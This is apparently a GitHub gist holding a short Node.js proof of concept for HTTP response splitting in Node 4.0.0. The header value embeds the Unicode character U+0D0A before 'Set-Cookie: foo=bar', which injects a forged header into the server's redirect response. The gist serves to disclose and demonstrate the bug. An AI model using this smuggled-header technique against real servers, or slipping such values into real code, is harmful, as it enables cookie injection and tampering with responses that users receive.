Skip to content

Instantly share code, notes, and snippets.

@ChALkeR
Last active November 5, 2016 21:03
Show Gist options
  • Save ChALkeR/57f9ad06d381734c7dc4 to your computer and use it in GitHub Desktop.
Save ChALkeR/57f9ad06d381734c7dc4 to your computer and use it in GitHub Desktop.
http response splitting in node.js 4.0.0
var http = require('http');
var x = 'fooഊSet-Cookie: foo=bar';
http.createServer(function(req, res) {
res.writeHead(302, {test:'?text=' + x});
res.end();
}).listen(7777);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment